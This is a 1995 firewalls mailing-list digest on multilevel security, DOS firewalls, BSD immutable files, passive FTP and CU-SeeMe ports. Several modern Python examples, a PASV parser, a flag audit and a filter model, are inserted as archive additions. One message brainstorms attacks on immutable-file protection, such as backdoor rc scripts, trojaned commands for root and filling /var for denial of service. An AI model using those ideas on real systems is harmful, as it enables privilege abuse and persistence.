(8.6.9/BSDI-Client) id QAA13240; Thu, 10 Aug 1995 16:06:27 -0400 Message-Id: <199508102006.QAA13240@metis.milkyway.com> X-Mailer: exmh version 1.6.1 5/23/95 X-Uri: http://www.milkyway.com/People/Michael_Richardson/Bio.html To: Rick Smith CC: 
firewalls@greatcircle.com Subject: Re: Multilevel Security is good for firewalls References: <199508101934.OAA27767@shade.sctc.com> In-reply-to: Your message of "Thu, 10 Aug 1995 14:34:59 CDT." <199508101934.OAA27767@shade.sctc.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 10 Aug 1995 16:06:24 -0400 From: Michael Richardson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mcr> So, you need B1 internally as well to be perfect. rsmith> It's a bad idea to put external servers inside your security rsmith> perimeter, given that such services are occasionally vulnerable to I was not talking about external servers. I was talking about internal clients. It is the old "but what if they download a virus/trojan/etc.." argument. Our recommendation is to put your "external servers" on a third interface, allow only the services intended to be offered to pass into the "service network", keep the service network from initiating any outgoing connections (so not one can use you to attack other people), and definitely do not let the service network talk to the private network. 
From firewalls-owner Thu Aug 10 16:08:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10659 for firewalls-outgoing; Thu, 10 Aug 1995 13:10:31 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10564 for ; Thu, 10 Aug 1995 13:10:14 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma010400; Thu Aug 10 13:09:33 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28166 for ; Thu, 10 Aug 1995 15:15:47 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28162 for ; Thu, 10 Aug 1995 15:15:46 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id PAA20027; Thu, 10 Aug 1995 15:08:25 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id PAA29106; Thu, 10 Aug 1995 15:08:23 -0500 From: Rick Smith Message-Id: <199508102008.PAA29106@shade.sctc.com> Subject: Re: Multilevel Security is good for firewalls To: firewalls@greatcircle.com Date: Thu, 10 Aug 1995 15:08:23 -0500 (CDT) Cc: smith@sctc.com (Rick Smith) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1143 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Continuing the discussion: >>Even if the firewall functions perfectly, you may have >>security problems because you perfectly pass some insecure protocol >>thru the firewall. > So, you need B1 internally as well to be perfect. It's a bad idea to put external servers inside your security perimeter, given that such services are occasionally vulnerable to overrun attacks. Packet and circult filters aren't very good at detecting those kinds of attack, either. 
A reasonable approach is to host Internet servers on something with nonbypassable access control (multilevel security or Type Enforcement). You could host the Internet visible server software on an external machine with MLS or TE. That keeps the server software from overrunning the machine and should also generate recognizable log messages if the software is being attacked (if you do it right). You use a separate domain/compartment and network interface to talk to the inside. So, if you are intent on placing your externally visible servers inside your firewall, a host with nonbypassable security is a good choice. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 16:23:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA15832 for firewalls-outgoing; Thu, 10 Aug 1995 15:04:06 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA15804 for ; Thu, 10 Aug 1995 15:04:01 -0700 Received: from pao.translation.com(204.30.204.3) by miles via smap (V1.3) id sma015797; Thu Aug 10 15:03:45 1995 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id PAA02276; Thu, 10 Aug 1995 15:02:52 -0700 Date: Thu, 10 Aug 1995 15:02:52 -0700 Message-Id: <199508102202.PAA02276@translation.com> Received: from unknown(204.30.204.114) by pao via smap (V1.3mjr) id sma002274; Thu Aug 10 15:02:50 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: mjr@iwi.com, mdr@vodka.sse.att.com From: afoss@translation.com (Andrew Foss) Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls Cc: steveg@cseic.saic.com, firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We believe that any general purpose OS(especially UNIX), is less than ideal for a FW, since it has a lot of overhead and a lot of potential for security holes due to it's complexity. 
A special purpose system with a very small code base and NO extra unnecessary services can provide the best performing most secure firewall. At 08:59 AM 8/10/95 -0700, mjr@iwi.com wrote: >mdr@vodka.sse.att.com writes: >>I don't know how BSD implements the sappnd or schg features for files. >>But if it involves permission bits or other data in the inode of the >>file, then it may be possilbe for a root user to change the inode's >>contents by seeking to the appropriate spot on the block or raw device >>and updating the inode. That's may sound hard to do, but it's not. > > The immutable bit stuff is pretty cleanly implemented and >makes a lot of sense. Once you've put the system into multiuser mode, >write access is disabled to the raw and cooked devices -- so forget >using fsdb to pop the inode. Ditto kmem -- used to be you could pop >the version of an inode in the kernel inode cache and not even have to >touch the disk. :) > >>Alternatively, root can patch /unix or the running system image to >>ignore the bits where ever they may be stored. Basically just replace >>part of the code in the function that does the check with an early >>return or jump or register set. > > [It's /bsd, not /unix. UNIX is a trademark of somebody or >other and they used to sue people over that distinction. :)] > > Patching the running system image usually requires write >access to /dev/kmem, etc, which is blocked in multiuser mode. I suppose >you theoretically might manage to find a way of overrunning some >part of the kernel to implement a "patch" to it, but the traditional >tricks are blocked off. Patching the buffer cache, ditto. > > Patching the on-disk copy of the kernel would require writing >the file, which, presumably, is something you'd want to keep immutable. > > The idea of immutable files is pretty sound, and the guys >who did it have thought it through pretty thoroughly. > >mjr. > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 
415/855-0725
1901 Embarcadero Rd., Palo Alto, CA 94303
FAX 415/424-9110
email afoss@translation.com
web www.translation.com

From firewalls-owner Thu Aug 10 16:30:51 1995
From: clh@ptech.com (Charles L. Hutson)
Message-Id: <9508102234.AA01373@nexus.ptech.com>
Subject: Re: Netscape's FTP through a Firewall
To: firewalls@greatcircle.com
Date: Thu, 10 Aug 95 18:33:44 EDT

I received several responses like the one below and everyone seems to be in agreement that the port that the server listens on is sent back to the client through the initial connection. It was suggested below that maybe I wasn't blocking the incoming packets but that I was blocking the OUTGOING packets on those high ports..... I was. After opening up those high, outgoing TCP ports, things worked great. Thank you all for the help.

clh

|
|On Thu, 10 Aug 1995, Charles L. Hutson wrote:
|
|> I'm having a problem using Netscape to FTP through my Firewall-1 firewall.
|> I've done quite a bit of testing and research and have figured out that
|> it's because Netscape's version of ftp adheres to the specifications of
|> RFC 1579. This RFC states that instead of doing a PORT command to tell
|> the ftp server what port to open a data connection on, it does a PASV
|> command. The following quote is from the above RFC:
|>
|> Fortunately, the necessary mechanisms already exist in the protocol.
|> If the client sends a PASV command, the server will do a passive TCP
|> open on some random port, and inform the client of the port number.
|> The client can then do an active open to establish the connection.
|>
|> This is the part that confuses me. If the server is going to inform
|> my client of the port number "on some random port", 1) How am I going
|> to know which port to listen on to get this critical information? It
|> seems like my ftp client would have to be frantically scanning the
|> entire range above 1024 to get this information. 2) Isn't
|> this going to force me to leave the entire range above 1024 wide open
|> in my firewall configuration?
|
|The reply to the pasv message is of a parsable format.
|
|Here is a log of such a session. Numbered lines are from the server.
|-=-=-=-=-
|user anonymous
|331 Guest login ok, send e-mail address as password.
|pass njs@scifi
|230 Guest login ok, access restrictions apply.
|pasv
|227 Entering Passive Mode (127,0,0,1,6,222)
|-=-=-=-=-
|This tells me that I should initiate the next data connection to
|127.0.0.1, port 1758. The 6 is the first octet of the port number, and
|the 222 is the second octet, in network order. So the client knows
|exactly which IP address and port to open the connection to.
|
|This is done so that I, as a client, can open the connection, and
|eliminates the usual FTP problem of needing to allow incoming connections
|to high ports that you run into when you use the PORT command. It also
|allows Netscape to easily work with IP Masquerading at the client end.
|
|> As it stands, I can't FTP through Netscape because my firewall blocks
|> that incoming random packet. Can anyone provide any suggestions.
|
|It is more likely that your firewall only allows outgoing connections to
|certain ports, and not to the range of ports above 1024.
|
|--
|Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com
|http://scifi.emi.net/njs.html -- Stop by and Light Up The World!
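The 227 reply quoted above has a fixed shape, so both a client and a firewall administrator can work out the data connection mechanically rather than "frantically scanning". The following is an added example written for this archive, not code from either poster: Python that parses a PASV reply into the host and port the client will connect to (the same 6,222 -> 1758 arithmetic Nick describes), produces the reply a server would send for a given port, and walks a control-channel transcript to list the outbound data connections a filter would have to permit. The transcript is the session quoted above; the check that the advertised host matches the server on the control connection is an added hardening step of this example, not something either poster describes.

```python
import re

# A 227 reply carries six comma-separated decimal octets: h1,h2,h3,h4,p1,p2
PASV_REPLY = re.compile(
    r"^227\b.*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)


def parse_pasv_reply(line):
    """Return (host, port) from a '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' line.

    The port is sent high byte first (network order): port = p1 * 256 + p2,
    so (6,222) -> 6 * 256 + 222 = 1758.
    """
    m = PASV_REPLY.match(line.strip())
    if not m:
        raise ValueError("not a 227 reply: %r" % line)
    octets = [int(x) for x in m.groups()]
    if any(o > 255 for o in octets):
        raise ValueError("octet out of range in %r" % line)
    host = ".".join(str(o) for o in octets[:4])
    port = octets[4] * 256 + octets[5]
    return host, port


def pasv_reply_for(host, port):
    """The server side: encode an IPv4 address and port into the 227 reply text."""
    if not 0 < port < 65536:
        raise ValueError("bad port %d" % port)
    h = host.split(".")
    if len(h) != 4 or any(not x.isdigit() or int(x) > 255 for x in h):
        raise ValueError("bad IPv4 address %r" % host)
    return "227 Entering Passive Mode (%s,%d,%d)" % (",".join(h), port >> 8, port & 0xFF)


def pasv_target_is_sane(control_peer, host, port):
    """Hardening check before connecting (this example's addition): the data port
    must be unprivileged and the advertised host must be the server we are
    already talking to, so a reply cannot steer the client to a third host."""
    return host == control_peer and port > 1023


def data_connections_from_log(log_text, control_peer):
    """Walk a control-channel transcript (server replies are the numbered lines)
    and collect every (host, port) the client will connect OUT to.

    Each is a TCP connection from a client high port (>1023) to host:port;
    those outbound flows are all a packet filter has to permit for passive
    mode, and nothing inbound to the client is needed."""
    targets = []
    for line in log_text.splitlines():
        if line.startswith("227"):
            host, port = parse_pasv_reply(line)
            if not pasv_target_is_sane(control_peer, host, port):
                raise ValueError("suspicious PASV target %s:%d" % (host, port))
            targets.append((host, port))
    return targets


# The session quoted in the message above (client lines and server replies as shown).
SESSION = """user anonymous
331 Guest login ok, send e-mail address as password.
pass njs@scifi
230 Guest login ok, access restrictions apply.
pasv
227 Entering Passive Mode (127,0,0,1,6,222)
"""

if __name__ == "__main__":
    for host, port in data_connections_from_log(SESSION, control_peer="127.0.0.1"):
        print("permit tcp client >1023 -> %s:%d" % (host, port))
```

Run stand-alone it prints the one outbound rule the quoted session needs, which is exactly the "high, outgoing TCP ports" Charles ended up opening.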
Charles L. Hutson, clh@ptech.com
Systems Engineer, Technical Services Division
Piedmont Technology Group
Phone 704.523.2400  Fax 704.523.7764

From firewalls-owner Thu Aug 10 17:32:55 1995
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9508102329.AA02756@citecub.citec.qld.gov.au>
Subject: Re: screened subnet & cisco performance
To: meyerd@Mailer.Uni-Marburg.DE
Date: Fri, 11 Aug 95 9:29:22 EST
Cc: firewalls@greatcircle.com
In-Reply-To: <9508101218.AA25532@Mailer.Uni-Marburg.DE>; from "meyer" at Aug 10, 95 2:27 pm

Hi,

The system I have is similar in layout to yours. Both routers have strong filtering and will only talk to the bastion host. There is no way for traffic to bypass the bastion.

My suggestion re your filters is that you decide what services you are going to allow through your firewall and analyse the requirements from there.
You will need to look at all the possible combinations of source-address and destination-address+port and whether the service is TCP or UDP based. You also need to consider anti-spoofing measures. Once you have done this analysis you can work out a set of filters.

If you do not feel confident in your ability to do this analysis, then you should get help from someone who can do it. Otherwise you are putting your company at risk. Explain it to management. They will either pay for the help or pull the plug. Don't do half a job.

Colin

From firewalls-owner Thu Aug 10 17:34:38 1995
Date: Thu, 10 Aug 1995 17:00:19 -0700 (PDT)
From: Michael Baumann
To: firewalls@GreatCircle.COM
Subject: Re: Multilevel Security is good for firewalls
In-Reply-To: <199508102014.PAA29388@shade.sctc.com>

On Thu, 10 Aug 1995, Rick Smith wrote:

> Marcus writes:
>
> > There's an outfit that builds a firewall running on DOS.
> >When I first heard of it, I thought the idea was ridiculous, but
> >in retrospect it's actually a really clever idea! There's no sendmail
> >to worry about ("multitasking? Huh?") no network daemons, ...
>
> But outsiders must access these services somehow or other. If the
> outsiders can send in data, then there are risks of bugs like the
> httpd overrun hack or Morris' finger.
> On a DOS system, such a bug
> immediately gives the attacker your server machine, firewall or not.
> On Unix the guy at least has to bust down a few more barriers. On a
> system with multilevel security or type enforcement, they face a
> pretty serious barrier.

Can I make a point here...

It would seem that we have a problem in assumptions being made. That assumption, as I see it, is that the DOS based firewall is an application proxy type, that Marcus is well known for. What if it is just a fancy packet filter? You know, single thread, single application, does not really listen to anything. Kinda like Sun's Sunscreen? Given this, there is nothing to attack, or overrun on the box. If you do manage to overrun anything, the box crashes, and stops forwarding. Fail-safe.

The TAMU drawbridge is an excellent example of what a DOS based firewall can do. It is fast, and simple to configure. I have extended ours to do logging and so forth but still very fast. And a perfect example of K.I.S.S. in action.

For those that start to say "Application Proxy is the only way to go!" I can only say - For us, a packet filter met the requirements of our security policy. And that is what drove our decision.

Michael Baumann
Electus Technology Inc. / Loma Linda University Medical Center
San Bernardino, California.
(909)799-8308 | Internet: baumann@llumc.edu

From firewalls-owner Thu Aug 10 19:00:20 1995
Message-Id: <9508111845.AA0042@localhost>
Date: Fri, 11 Aug 95 11:43:54 +0000
From: spence4@ibm.net
To: firewalls@greatcircle.com
Subject: Proxies and Firewalls : Some Basic Questions

Hi,

I've just subscribed to the 'firewalls' mailing list although I've been reading the FAQ and the mailing list archives for a couple of weeks now. I'm on a security committee for my organisation and we are seeking to put in an internet connection. I may also be involved in the implementation as I have a technical background (though not in unix or Internet).

My question is down to the basics I suppose. My understanding is that you can protect your internal network from unwanted intruders by two methods, firewall and proxy servers. My organisation has been considering the Firewall-1 product. However, an argument has been presented internally that proxy servers are much more secure and can not be bypassed by unwanted intruders. Is this true? Are proxies totally secure? Also, what are the limitations of proxy servers (I have read that you require modified client programs).
Does anyone have any recommendations on proxy servers (commercial or otherwise) and what is the availability of client programs. Finally, what are the advantages/disadvantages of firewalls. My reading indicates that there is more flexibility but the downside is security exposures. Also, how do proxies work through firewalls (as I've read this is possible also).

With regards to the mailing list archives, what program do I use on my Intel PC to read, for example, firewalls.9508.z. I assume that this program is compressed in some format. I want to FTP some of the archives so I can read off-line.

Thanks and regards,

//----------------------------------------------------------
// Colin Spence
// Melbourne, Australia
// SPENCE4@IBM.NET

From firewalls-owner Thu Aug 10 20:30:02 1995
Date: Fri, 11 Aug 95 10:46:14 +0800
Message-Id: <9508110246.AA23668@caldecot.com.sg>
To: firewalls@GreatCircle.COM
From: sudu@tcs.com.sg (Sudershan)
Subject: Setting up a firewall

My company is in the process of setting up a Firewall. I have been assigned to identify the Hardware and Software for this. We have a Novell LAN/WAN network with MSmail and over 2000 nodes which is mainly being used for office automation, and SCO unix boxes running TCP/IP and VAXes running DECnet.
We have currently installed a CERN WEB server which is in an independent network by itself catering to 10-15 users. Now we are planning to give access to all the 2000 users for MSmail and a few users to access the internet features. We also want to give access to our contractors to upload data from our server to their systems thru ftp. (That is, users should be able to access our server using telnet/ftp/mail/Mosaic etc if permissions are given).

I need some info about what kind of firewall hardware and software has to be installed in case of the above environment, as various vendors are talking about single layer firewall, 3 layer firewall, screening routers etc.

Thanks for the info in advance.

Regards
Sudershan

From firewalls-owner Thu Aug 10 20:45:02 1995
Message-Id: <9508101726.AA26472@ig1.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: mjr@iwi.com
Date: Thu, 10 Aug 1995 13:27:54 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199508101559.LAA13701@switchblade.iwi.com> from "Marcus J. Ranum" at Aug 10, 95 11:59:11 am

Marcus,

> The idea of immutable files is pretty sound, and the guys
> who did it have thought it through pretty thoroughly.
>
> mjr.

Thank you for the excellent information on bsd.
Looks like they put some thought into it, that's good to see. So writing /dev/kmem or the raw devices won't work. Let me try a few more jabs at it if you don't mind, before we call it a security feature.

How do they administer the system in multiuser mode? Presumably adding users and accounts and such would be disallowed. Also adding undesired services such as a telnetd or packet grabber would be disallowed. Ok then, no maintenance while in multi-user mode. Ouch!

Would all of the cron scripts and rc scripts and network startup scripts also be immutable? If I can affect any file that root runs during single user mode, I can still hack the system, I just have to wait for a re-boot. Hmmm, can I force a re-boot? Hmmm, can I fill up the var file system, or is that immutable too! :) I'll just write to the tcp log files, surely the log files aren't immutable or unappendable. Denial of service attacks abound.

Can I unlink and replace an immutable file if the directory is not immutable? (I bet that they thought of that one, it's too easy)

Unless you limit the root user to the console in single user mode (which I bet they don't really do) some admin type has probably built a backdoor into the system for me already. /etc/rc2.d/S99update would do the trick. Do the packadd scripts do delayed updates? They've probably got a hook somewhere too. Maybe I'll just lay a T.H. around for root to trip over. Is the 'ls' command immutable?

By the time you get around to locking all of the files that have to be immutable, you might as well make /, /var and /usr (please sub in bsd equivalent names) readonly file systems. Ouch!

How does init ever go back to init state 1? Or is that disallowed too. If not, what secret does init know for changing the run state that a root user can't do. Can I fool the system into thinking that it's back in init state 1? Is the init process protected from modifications by a process debugger? Is /dev/swap immutable?
Forcing a reboot from scratch for every (even trivial) admin would work, but ouch! that hurts too!

The immutable file concept may be more security speak than security feature. It might not work at all, but if it does it might hurt too much to use.

A B1 system can protect all of the TCB by only allowing level 1 logins and level 1 network daemons while in multi user mode. The TCB is maintained at level 0. But the system can still be maintained in multiuser mode at the console or by dialin over a secure modem, or if the host is also a firewall you could limit level 0 logins to a secure interface and encrypted link. Each device and user has a clearance associated with it and both the device and the user must be cleared to level 0 before they can su to root. (Login as root is disallowed at C2 and higher, because it violates I&A, being an anonymous login)

Hmmm, all of the useless B1 stuff sure is starting to sound nice. Can the user write /dev/kmem or /dev/dsk/xxx? No they can't even see them! How about /unix? Mandatory policy protects it. Can they become root? Sorry tty device not cleared! Can they trip root? `>/tmp/ls` just creates a file that's labeled level 1, and root can't exec level 1 code because it's not trusted. Modify config files? Mandatory policy protects them all.

It's nice to have a model that hundreds of people have looked at.

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

PS:
> [It's /bsd, not /unix. UNIX is a trademark of somebody or
> other and they used to sue people over that distinction. :)]

bsd??? never heard of it, we only run operating systems named after bad movies or single clergy ;) Seriously, I'd like to learn more about bsd, but it's hard enough to stay up-to-date on my current scope. And thanks again for the info.
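Mark's questions about which files need the flag, and whether a writable directory next to an immutable file undoes the protection, are the ones an administrator of a BSD bastion host has to answer for each file root touches at boot. The following is an added example for this archive, not code from either poster: a small Python audit that, given the 4.4BSD file flags of such files and the running securelevel, reports which ones root could still alter in multiuser mode. It assumes the securelevel semantics mjr described earlier in the thread: at securelevel 1 or higher the system flags schg/sappnd cannot be cleared, while the user flags uchg/uappnd can be cleared by the file's owner at any securelevel, so uchg alone is no protection against root. The file list and flag values are constructed for the example; the `live_entries` helper reads real flags where the platform's stat() exposes them.

```python
import os
import stat

# 4.4BSD file flags as exposed by Python's stat module.
SYS_LOCK = stat.SF_IMMUTABLE | stat.SF_APPEND    # schg / sappnd: system flags
USER_LOCK = stat.UF_IMMUTABLE | stat.UF_APPEND   # uchg / uappnd: user flags


def protection(flags, securelevel):
    """Classify how well a file's flags hold up against root in multiuser mode.

    'strong' - schg or sappnd set and securelevel >= 1: cannot be cleared
               without dropping to single-user mode (a reboot, which shows).
    'weak'   - only uchg/uappnd set, or system flags at securelevel 0: the
               owner (root included) can clear it with chflags at any time.
    'none'   - no immutability at all.
    """
    if flags & SYS_LOCK:
        return "strong" if securelevel >= 1 else "weak"
    if flags & USER_LOCK:
        return "weak"
    return "none"


def audit(entries, securelevel):
    """entries: list of (path, own_flags, parent_dir_flags).

    Returns (path, finding) for every file that is not fully protected.  A
    file whose parent directory is not system-immutable is reported even when
    the file itself is schg, because a new file can be dropped beside it (an
    extra rc script root runs at the next boot, for example).
    """
    findings = []
    for path, flags, parent_flags in entries:
        level = protection(flags, securelevel)
        if level != "strong":
            findings.append((path, "file not system-immutable: %s" % level))
        if protection(parent_flags, securelevel) != "strong":
            findings.append((path, "parent directory not system-immutable"))
    return findings


def live_entries(paths):
    """Read real flags with os.stat().  st_flags only exists on BSD-derived
    systems (Linux has no flags field in stat), so a missing attribute is 0."""
    out = []
    for p in paths:
        st = os.stat(p)
        parent = os.stat(os.path.dirname(p) or ".")
        out.append((p, getattr(st, "st_flags", 0), getattr(parent, "st_flags", 0)))
    return out


# Constructed sample (not a real host): flags an admin might have set on a bastion.
SAMPLE = [
    ("/bsd",              stat.SF_IMMUTABLE, stat.SF_IMMUTABLE),  # kernel, / locked
    ("/etc/rc",           stat.SF_IMMUTABLE, 0),                  # /etc left writable
    ("/etc/rc.local",     stat.UF_IMMUTABLE, 0),                  # uchg only: root can undo
    ("/var/log/messages", stat.SF_APPEND,    stat.SF_IMMUTABLE),  # append-only log
    ("/bin/ls",           0,                 stat.SF_IMMUTABLE),  # dir locked, file not
]

if __name__ == "__main__":
    for path, finding in audit(SAMPLE, securelevel=1):
        print(path, "-", finding)
```

Against the constructed sample at securelevel 1 the audit reports /etc/rc and /etc/rc.local for their writable directory, /etc/rc.local again for carrying only the user flag, and /bin/ls for having no flag at all; at securelevel 0 every entry is reported, since none of the flags then resist root.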
From firewalls-owner Thu Aug 10 21:00:55 1995
Message-Id: <9508101832.AA01245@ig1.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Re: Multilevel Security is good for firewalls
To: mjr@iwi.com
Date: Thu, 10 Aug 1995 14:34:02 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199508101543.LAA13640@switchblade.iwi.com> from "Marcus J. Ranum" at Aug 10, 95 11:43:58 am

Mjr writes:
> There's an outfit that builds a firewall running on DOS.
> When I first heard of it, I thought the idea was ridiculous, but
> in retrospect it's actually a really clever idea! There's no sendmail
> to worry about ("multitasking? Huh?") no network daemons, no NFS,
> no spending hours vetting your UNIX config to see what nonsense
> the vendor left there, etc, etc. If the firewall process crashes,
> the system instantly becomes inoperative. Pretty clever, really.
> Basically, you accept the fact that the firewall is a special purpose
> machine and treat it accordingly.
> I'd rather run DOS than B1, and frankly, I suspect a DOS
> box running a single program that just manages IP firewalling is a
> hell of a lot harder to break into than a CMW or some kind of UNIX
> box running B1. (and a little cheaper and easier to manage)
>
> mjr.
>

And if your software breaks, you also have no protection of the system from the user.
And no idea what happened to the system or how it happened or that it happened. Plus you're handing the security of your organization over to an unevaluated black box based on someone's idea of what security means. Has that idea seen the light of peer review? Or can anyone order one of these, do some disassembly and find an easy hole? Plus DOS may be listening to more than you think if it has a tcp/ip stack. Do you have source to the tcp/ip code?

I can just as easily run B1 unix w/o network daemons if all I want is to live w/o proxies. If you proxy in DOS or windows, then the OS has absolutely no protection from software errors.

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Thu Aug 10 22:00:09 1995
From: "Marcus J. Ranum"
Message-Id: <199508110436.AAA15591@switchblade.iwi.com>
Subject: Re: s[id]ewinder
To: smith@sctc.com (Rick Smith)
Date: Fri, 11 Aug 1995 00:36:41 -0400 (EDT)
Cc: mjr@iwi.com, smith@sctc.com, firewalls@GreatCircle.COM
In-Reply-To: <199508101817.NAA26039@shade.sctc.com> from "Rick Smith" at Aug 10, 95 01:17:39 pm
Reply-To: mjr@iwi.com
Organization: Information Works! Inc, Baltimore, MD
Rick Smith writes:
>I think it's an interesting commentary on The World Out There that
>customers are more impressed by the Sidewinder Challenge as evidence
>of effective security than they are in the SMG's formal assurance.

Yes, uninformed customers are easily impressed by flash. You're surprised by that? I thought that was the point of the exercise!

mjr.

From firewalls-owner Thu Aug 10 22:17:17 1995
Date: Thu, 10 Aug 1995 21:48:52 -0700 (PDT)
From: Tim Keanini
To: firewalls@greatcircle.com
Subject: cu-seeme udp ports

Without pulling out my sniffer, can someone confirm that I am making the right assumptions on a cu-seeme session.

    client          server
    udp >1023       udp eq 7648
    udp >1023       udp eq 7649
    udp >1023       udp eq 7650
    udp >1023       udp eq 7651

I got these "well known ports" from the server code in the #define's. Can someone tell me if I have assumed correctly or if the cu-seeme culture has picked other ports for their udp ports. Before anyone starts to tell me about evil udp traffic, I am just wondering about this. I am not putting a network in danger. :-) Please reply to me personally so that I can summarize and reply with one answer.
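Colin's advice earlier in this section (enumerate every source, destination+port and protocol combination, then add anti-spoofing) and Tim's port table above are the kind of thing worth writing down as an explicit, default-deny rule table and testing against sample packets before it goes on a router. The following is an added example for this archive, not code from either poster: a small Python packet-filter model with rules for the CU-SeeMe flows as Tim lists them (client UDP >1023 to server UDP 7648-7651, and the replies) plus an anti-spoofing rule that drops anything arriving on the outside interface with an inside source address. The inside network 10.0.0.0/8, the interface name, the 192.0.2.10 server and the sample packets are all constructed for the example; whether 7648-7651 are really the ports CU-SeeMe uses is the question the post asks, and the example just takes the list as given.

```python
import ipaddress

INSIDE = ipaddress.ip_network("10.0.0.0/8")   # constructed internal network
ANY = ipaddress.ip_network("0.0.0.0/0")
ALL_PORTS = (0, 65535)
HIGH = (1024, 65535)                           # unprivileged ports, ">1023"
CUSEEME = (7648, 7651)                         # server UDP ports from the post

# Rule: (iface, direction, proto, src_net, src_ports, dst_net, dst_ports, action).
# First match wins; no match at all is a deny.  The anti-spoofing rule comes
# first on purpose: the reply rule below it would otherwise accept a packet
# that claims an inside source address and a CU-SeeMe source port.
RULES = [
    ("ext", "in",  "any", INSIDE, ALL_PORTS, ANY,    ALL_PORTS, "deny"),    # anti-spoof
    ("ext", "out", "udp", INSIDE, HIGH,      ANY,    CUSEEME,   "permit"),  # client -> server
    ("ext", "in",  "udp", ANY,    CUSEEME,   INSIDE, HIGH,      "permit"),  # server replies
]


def in_range(port, rng):
    return rng[0] <= port <= rng[1]


def evaluate(pkt, rules=RULES):
    """pkt: dict with iface, direction, proto, src, sport, dst, dport.
    Returns the action of the first matching rule, or 'deny' by default."""
    src = ipaddress.ip_address(pkt["src"])
    dst = ipaddress.ip_address(pkt["dst"])
    for iface, direction, proto, snet, sports, dnet, dports, action in rules:
        if iface != pkt["iface"] or direction != pkt["direction"]:
            continue
        if proto != "any" and proto != pkt["proto"]:
            continue
        if src not in snet or dst not in dnet:
            continue
        if not (in_range(pkt["sport"], sports) and in_range(pkt["dport"], dports)):
            continue
        return action
    return "deny"


def packet(iface, direction, proto, src, sport, dst, dport):
    return dict(iface=iface, direction=direction, proto=proto,
                src=src, sport=sport, dst=dst, dport=dport)


# Constructed sample traffic seen at the outside interface.
SAMPLES = {
    "cuseeme_out":  packet("ext", "out", "udp", "10.1.1.5",   40000, "192.0.2.10", 7648),
    "cuseeme_back": packet("ext", "in",  "udp", "192.0.2.10", 7648,  "10.1.1.5",   40000),
    "spoofed":      packet("ext", "in",  "udp", "10.1.1.5",   7648,  "10.1.1.9",   40000),
    "wrong_port":   packet("ext", "in",  "udp", "192.0.2.10", 7652,  "10.1.1.5",   40000),
    "tcp_to_7648":  packet("ext", "out", "tcp", "10.1.1.5",   40000, "192.0.2.10", 7648),
}

if __name__ == "__main__":
    for name, p in SAMPLES.items():
        print("%-13s %s" % (name, evaluate(p)))
```

The two CU-SeeMe packets are permitted; the spoofed packet is dropped by the first rule even though it would match the reply rule, the 7652 reply falls outside the listed range, and TCP to 7648 is denied because the rule table only ever mentioned UDP. Adding a service means adding its rows to the table, which is the combination analysis Colin describes.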
--blast

Tim Keanini, aka blast
"The limits of my language, are the limits of my world." --Ludwig Wittgenstein
PUB KEY: http://www-swiss.ai.mit.edu/~bal/pks-commands.html

From firewalls-owner Thu Aug 10 22:35:44 1995
Date: 10 Aug 95 13:46:00 +1700
From: MAHAJAN_VIVEK@tandem.com
Message-Id: <199508102207.AA18745@comm.tandem.com>
To: firewalls@greatcircle.com
Subject: Type enforcement ???

Hello:

Is there a document out there that explains what type enforcement is? One of the commercial firewall vendors I talked to explained to me that theirs is the only product that implements type enforcement and this gives their product a level of security no other product in the market does. I am quite familiar with the different firewall products and what kind of implementation they have but I am not quite familiar with what was described to me as "true type enforcement." What does it mean in the context of firewalls and where, if anywhere, can I get more information about this concept? I would appreciate any help.
Regards
Vivek

From firewalls-owner Thu Aug 10 22:36:17 1995
From: "Marcus J. Ranum"
Message-Id: <199508110453.AAA15612@switchblade.iwi.com>
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: mdr@vodka.sse.att.com
Date: Fri, 11 Aug 1995 00:53:46 -0400 (EDT)
Cc: mjr@iwi.com, firewalls@greatcircle.com
In-Reply-To: <9508101726.AA26464@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 10, 95 01:27:54 pm
Reply-To: mjr@iwi.com
Organization: Information Works! Inc, Baltimore, MD

mdr@vodka.sse.att.com writes:
>Thank you for the excellent information on bsd. Looks like they put some
>thought into it, that's good to see. So writing /dev/kmem or the raw
>devices won't work. Let me try a few more jabs at it if you don't mind,
